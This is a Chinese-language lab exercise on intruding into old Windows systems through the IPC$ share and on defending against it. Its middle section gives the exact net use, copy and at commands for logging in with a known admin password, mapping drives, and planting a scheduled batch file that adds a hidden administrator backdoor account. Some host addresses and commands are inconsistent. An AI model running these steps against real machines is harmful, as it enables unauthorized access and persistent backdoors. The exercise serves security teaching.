IPC$入侵方法及防范

 實驗概述
IPC$(Internet Process Connection)是共享"命名管道"的資源，它是為了讓進程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進行加密數(shù)據(jù)的交換，從而實現(xiàn)對遠(yuǎn)程計算機的訪問。IPC$是Windows NT的一項新功能，它有一個特點，即在同一時間內(nèi)，兩個IP之間只允許建立一個連接。NT在提供了ipc$功能的同時，在初次安裝系統(tǒng)時還打開了默認(rèn)共享，即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導(dǎo)致了系統(tǒng)安全性的降低。
設(shè)置IPC$的初衷是為了方便管理員的管理，當(dāng)該功能切被大量用于網(wǎng)絡(luò)入侵。默認(rèn)情況下IPC$是已被共享的，除非手動刪除了IPC$。
平時我們總能聽到有人在說ipc$漏洞，ipc$漏洞，其實ipc$并不是一個真正意義上的漏洞,我想之所以有人這么說，一定是指微軟自己安置的那個‘后門’：空會話（Null session）。
如何查找IPC$漏洞主機？可以使用“流光2000”等軟件（http://sec.chinabyte.com/327/9143827.shtml）。
2.1.2 IPC$入侵故障處理
（1）使用IPC$連接失敗時，首先考慮一下幾點：
遠(yuǎn)程主機操作系統(tǒng)可能不是Windows NT/2000/XP/2003
遠(yuǎn)程主機可能刪除了IPC$共享
遠(yuǎn)程主機未開啟139或445端口（或防火墻）
查看幫助：net use /?

2.1.3 實驗步驟
任務(wù)一：利用已知的系統(tǒng)賬號和密碼進行入侵
假設(shè)已經(jīng)找到了一臺這樣的主機，地址是202.201.244.100，管理員帳號是Administrator，密碼是123456。
（1）開始菜單中進入“命令提示符”窗口。
（2）建立IPC$連接，命令格式為：
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
連接成功后，將顯示“命令成功完成”的提示信息。
（3）進行網(wǎng)絡(luò)驅(qū)動器映射，將遠(yuǎn)程主機上的D$映射為本地的G盤。
net use G:\\202.201.244.99\D$
（4）刪除網(wǎng)絡(luò)連接
net use * /del
任務(wù)二：在對方系統(tǒng)上留下后門
在遠(yuǎn)程主機上創(chuàng)建一個后門賬號以備將來登陸時使用，編寫一個可在遠(yuǎn)程主機上可以自動運行的文件（例如：批處理文件），利用遠(yuǎn)程主機的Windows計劃任務(wù)功能實現(xiàn)遠(yuǎn)程入侵。
(1)創(chuàng)建一個批處理文件（保存為sysdoor.bat），名為sysdoor的用戶賬號，密碼為123456，并將其加入到administrators（系統(tǒng)管理員組中）。
net user sysdoor 123456 /add
net localgroup administrators sysdoor /add
（2）建立與遠(yuǎn)程主機的IPC$連接
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
（3）將已創(chuàng)建的批處理文件復(fù)制到遠(yuǎn)程主機上
copy sysdoor.bat \\202.201.244.100\d$
（4）利用Windows計劃任務(wù)定期執(zhí)行批處理文件
查看遠(yuǎn)程主機上當(dāng)前系統(tǒng)時間：net time \\202.201.244.100
讓系統(tǒng)在14:00時運行批處理文件：
at \\202.201.244.100 14:00 d:\sysdoor.bat
（5）斷開與遠(yuǎn)程主機上的IPC$連接
net use * /del
（6）在14:00以后，嘗試使用sysdoor賬號就行IPC$連接。

備注：也可以直接將對方的guest用戶賬號激活
net user guest /active
net user guest 123456
net localgroup administrators guest /add

任務(wù)三：防御IPC$入侵
（1）禁止在連接中進行枚舉攻擊
運行“regedit”命令，打開HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa，把restrictanonymoussam的值改為1，如下圖所示。



（2）禁止默認(rèn)共享
首先查看共享資源：net share ipc$ /del
刪除IPC$共享：net share ipc$ /del
刪除admin$共享：net share admin$ /del
刪除d$共享：net share d$ /del

備注：添加共享net share c$=c:\
net share d$=d:\

（3）停止Server服務(wù)
Net stop server